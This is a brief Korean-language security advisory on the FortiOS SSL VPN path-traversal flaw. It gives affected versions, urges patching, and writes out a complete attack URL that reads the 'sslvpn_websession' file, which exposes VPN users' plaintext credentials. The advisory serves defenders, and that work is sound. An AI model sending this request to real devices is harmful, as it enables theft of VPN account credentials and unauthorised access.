Fortinet FortiOS SSL VPN 자격 증명 노출 취약성
1) 영향
- 악용할 경우 공격자가 Fortinet VPN에서 민감한 "sslvpn_websession" 파일에 접근하도록 허용할 수 있음
- 이 파일은 세션 관련 정보가 포함되어 있으며 Fortinet VPN 사용자의 계정명과 비밀번호가 평문 상태로 공개될 수 있음
2) 취약점 페이로드
- [Target IP]/remote/fgt_lang?lang=/../ 패턴
3) 공격 예시
- [Target IP]/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
4) 영향 받는 버전(SSL VPN이 활성화된 경우에만 영향)
- FortiOS 6.0.0 ~ 6.0.4
- FortiOS 5.6.3 ~ 5.6.7
- FortiOS 5.4.6 ~ 5.4.12
※ 현재까지(2023.04) 계속 공격 탐지되고 있으므로 패치 필수!!
